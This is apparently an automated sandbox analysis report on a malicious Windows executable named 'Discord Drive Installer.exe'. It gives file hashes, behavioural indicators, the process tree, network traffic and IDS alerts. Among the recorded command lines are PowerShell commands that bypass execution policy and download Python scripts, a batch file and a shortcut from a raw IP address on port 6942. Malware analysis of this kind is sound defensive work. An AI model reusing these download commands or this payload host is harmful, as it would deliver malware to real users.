File name:

Discord Drive Installer.exe

Full analysis: https://app.any.run/tasks/fa0b2e39-81e9-4a9b-b372-cb1ab7b37ea3
Verdict: Malicious activity
Analysis date: September 08, 2024, 15:24:38
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

1119F847710C792096433EFC376C239F

SHA1:

6D39EEDE3B4E838E503964D49D54828122B6F11B

SHA256:

20C69D0FC9EA7028125310D2EEBF08FB92A6DE1CC5DB3259DF3C8A66E8AD6571

SSDEEP:

3072:7CYa+0Nu6vQAkQ5S7JmyxCbBKhiTbMyOKtMeXBF5b2hbeVbN:IQLi8NiTbVODMByhyVbN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1104)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4292)
  • SUSPICIOUS

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4292)
      • choco.exe (PID: 2112)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 4292)
    • The process executes Powershell scripts

      • cmd.exe (PID: 1104)
    • Executing commands from a ".bat" file

      • Discord Drive Installer.exe (PID: 4692)
    • Starts CMD.EXE for commands execution

      • Discord Drive Installer.exe (PID: 4692)
    • Probably download files using WebClient

      • cmd.exe (PID: 1104)
    • Drops 7-zip archiver for unpacking

      • powershell.exe (PID: 4292)
    • Creates a directory (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4292)
    • Searches for installed software

      • choco.exe (PID: 2112)
    • Reads security settings of Internet Explorer

      • choco.exe (PID: 2112)
    • Checks Windows Trust Settings

      • choco.exe (PID: 2112)
    • The system shut down or reboot

      • choco.exe (PID: 2112)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 1104)
    • Downloads file from URI

      • powershell.exe (PID: 6904)
      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 3908)
      • powershell.exe (PID: 2068)
      • powershell.exe (PID: 5264)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 4192)
    • Found IP address in command line

      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 6904)
      • powershell.exe (PID: 3908)
      • powershell.exe (PID: 2068)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 5264)
      • powershell.exe (PID: 4192)
      • powershell.exe (PID: 5552)
    • Connects to unusual port

      • powershell.exe (PID: 6904)
      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 2068)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 3908)
      • powershell.exe (PID: 4192)
      • powershell.exe (PID: 5264)
      • powershell.exe (PID: 5552)
    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 1104)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 7040)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1104)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 1104)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1104)
  • INFO

    • Checks supported languages

      • Discord Drive Installer.exe (PID: 4692)
      • choco.exe (PID: 2112)
      • choco.exe (PID: 4192)
      • choco.exe (PID: 6616)
    • Create files in a temporary directory

      • Discord Drive Installer.exe (PID: 4692)
      • choco.exe (PID: 2112)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4292)
    • The process uses the downloaded file

      • powershell.exe (PID: 4292)
      • choco.exe (PID: 2112)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Creates files in the program directory

      • powershell.exe (PID: 4292)
      • choco.exe (PID: 6616)
      • cmd.exe (PID: 1104)
      • choco.exe (PID: 2112)
      • powershell.exe (PID: 6904)
      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 2068)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 3908)
      • powershell.exe (PID: 5264)
    • Checks proxy server information

      • powershell.exe (PID: 4292)
      • choco.exe (PID: 2112)
      • powershell.exe (PID: 6904)
      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 2068)
      • powershell.exe (PID: 3908)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 4192)
      • powershell.exe (PID: 5264)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Reads the computer name

      • choco.exe (PID: 6616)
      • choco.exe (PID: 4192)
      • choco.exe (PID: 2112)
    • Reads the machine GUID from the registry

      • choco.exe (PID: 6616)
      • choco.exe (PID: 2112)
    • Reads Environment values

      • choco.exe (PID: 2112)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4292)
    • Reads the software policy settings

      • choco.exe (PID: 2112)
    • Disables trace logs

      • choco.exe (PID: 2112)
      • powershell.exe (PID: 3316)
      • powershell.exe (PID: 6904)
      • powershell.exe (PID: 2068)
      • powershell.exe (PID: 3908)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 5552)
      • powershell.exe (PID: 4192)
      • powershell.exe (PID: 4292)
      • powershell.exe (PID: 5264)
    • Process checks Powershell version

      • choco.exe (PID: 2112)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (41)
.exe | Win64 Executable (generic) (36.3)
.dll | Win32 Dynamic Link Library (generic) (8.6)
.exe | Win32 Executable (generic) (5.9)
.exe | Win16/32 Executable Delphi generic (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:45+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 70656
InitializedDataSize: 61440
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
158
Monitored processes
28
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
start discord drive installer.exe conhost.exe no specs cmd.exe no specs net.exe no specs net1.exe no specs powershell.exe setx.exe no specs setx.exe no specs setx.exe no specs setx.exe no specs choco.exe no specs choco.exe no specs choco.exe sppextcomobj.exe no specs slui.exe no specs shutdown.exe no specs conhost.exe no specs icacls.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe powershell.exe icacls.exe no specs powershell.exe powershell.exe discord drive installer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
232C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
1104"C:\WINDOWS\sysnative\cmd" /c "C:\Users\admin\AppData\Local\Temp\9DEE.tmp\9DEF.tmp\9DF0.bat "C:\Users\admin\AppData\Local\Temp\Discord Drive Installer.exe""C:\Windows\System32\cmd.exeDiscord Drive Installer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
2068powershell -Command "Invoke-WebRequest -Uri http://216.203.15.234:6942/download.py -OutFile download.py"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
2080\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeDiscord Drive Installer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2112"C:\ProgramData\chocolatey\choco.exe" install curl -y -forceC:\ProgramData\chocolatey\choco.exe
choco.exe
User:
admin
Company:
Chocolatey Software, Inc.
Integrity Level:
HIGH
Description:
Exit code:
4294967295
Version:
2.3.0.0
Modules
Images
c:\programdata\chocolatey\choco.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2232"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exeSppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2576"C:\WINDOWS\System32\setx.exe" ChocolateyLastPathUpdate 133702826976781496C:\Windows\System32\setx.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Setx - Sets environment variables
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\setx.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
2584\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeshutdown.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3316powershell -Command "Invoke-WebRequest -Uri http://216.203.15.234:6942/config.json -OutFile config.json"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
3908powershell -Command "Invoke-WebRequest -Uri http://216.203.15.234:6942/log_display.py -OutFile log_display.py"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
Total events
52 117
Read events
52 084
Write events
32
Delete events
1

Modification events

(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4292) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
15
Suspicious files
14
Text files
161
Unknown types
0

Dropped files

PID
Process
Filename
Type
4292powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vmedjydg.bsp.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4292powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kvft1qms.khv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4292powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kqpcxlvt.o0u.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\init.ps1text
MD5:534EDDF59B2A518F5475B44362D9FFF6
SHA256:71C2606BF144C5D697B85BB170D063892D484A87F9F7FB146356BDE827D4264E
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall.ps1text
MD5:DB89FC7120818885D1A1E112AC7BE6C1
SHA256:C46903CFED1D74620630D0653CE057B3079AF5789AFEB1A5F884298A8693B4EC
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateysetup.psm1text
MD5:77102E5869DBEED024C2C95A697DC94B
SHA256:D8E4B60FE7C256BE2D50DBBAF9F4837C738E1844CD17198614CA7CF26176717A
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\_rels\.relsxml
MD5:BB9B566B51B59EF054CBC0D22DF193C4
SHA256:DDDB65206BB1DE00C7EC48740C10C2ABC0B440F22C49FB1FD74AFEDA0D095528
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\choco.exe.manifestxml
MD5:1B3ED984F60915F976B02BE949E212CB
SHA256:D715D6071E5CDD6447D46ED8E903B9B3AD5952ACC7394EE17593D87A546C17FC
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\choco.exeexecutable
MD5:76D8FE544353FB6DFC258FCFBE9264D9
SHA256:9A058764417A634DCB53AF74C50F9552AF3BC0B873A562F383AF36FEEFC1496E
4292powershell.exeC:\Users\admin\AppData\Local\Temp\chocolatey\chocoInstall\tools\chocolateyInstall\helpers\Chocolatey.PowerShell.dllexecutable
MD5:FD3CAC756296E10B23ACB8B9F9A0FEAD
SHA256:B0915EB7F0D7FDBE4DCF6756D163199C80E49220F3FEC9270C8E75CCD4349C30
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
38
DNS requests
18
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3352
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7004
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7004
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6904
powershell.exe
GET
200
216.203.15.234:6942
http://216.203.15.234:6942/upload.py
unknown
unknown
1436
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2068
powershell.exe
GET
200
216.203.15.234:6942
http://216.203.15.234:6942/download.py
unknown
unknown
7040
powershell.exe
GET
200
216.203.15.234:6942
http://216.203.15.234:6942/run.bat
unknown
unknown
3908
powershell.exe
GET
200
216.203.15.234:6942
http://216.203.15.234:6942/log_display.py
unknown
unknown
4192
powershell.exe
GET
200
216.203.15.234:6942
http://216.203.15.234:6942/DiscordDrive.lnk
unknown
unknown
3316
powershell.exe
GET
200
216.203.15.234:6942
http://216.203.15.234:6942/config.json
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
3352
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2120
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6856
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4292
powershell.exe
104.18.21.76:443
chocolatey.org
CLOUDFLARENET
whitelisted
3352
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3352
svchost.exe
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3260
svchost.exe
40.113.110.67:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2120
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1436
svchost.exe
40.126.32.76:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
  • 4.231.128.59
  • 52.167.17.97
  • 51.104.136.2
whitelisted
google.com
  • 142.250.181.238
whitelisted
chocolatey.org
  • 104.18.21.76
  • 104.18.20.76
whitelisted
community.chocolatey.org
  • 104.18.21.76
  • 104.18.20.76
whitelisted
packages.chocolatey.org
  • 104.18.21.76
  • 104.18.20.76
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
login.live.com
  • 40.126.32.76
  • 40.126.32.136
  • 40.126.32.140
  • 40.126.32.74
  • 20.190.160.14
  • 40.126.32.68
  • 40.126.32.133
  • 20.190.160.20
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
slscr.update.microsoft.com
  • 20.114.59.183
whitelisted

Threats

PID
Process
Class
Message
4292
powershell.exe
Potentially Bad Traffic
ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)
2112
choco.exe
Potentially Bad Traffic
ET INFO Observed Chocolatey Windows Package Management Domain (chocolatey .org in TLS SNI)
6904
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
3316
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2068
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
3908
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7040
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5264
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5552
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
5552
powershell.exe
Misc activity
ET INFO LNK File Downloaded via HTTP
2 ETPRO signatures available at the full report
No debug info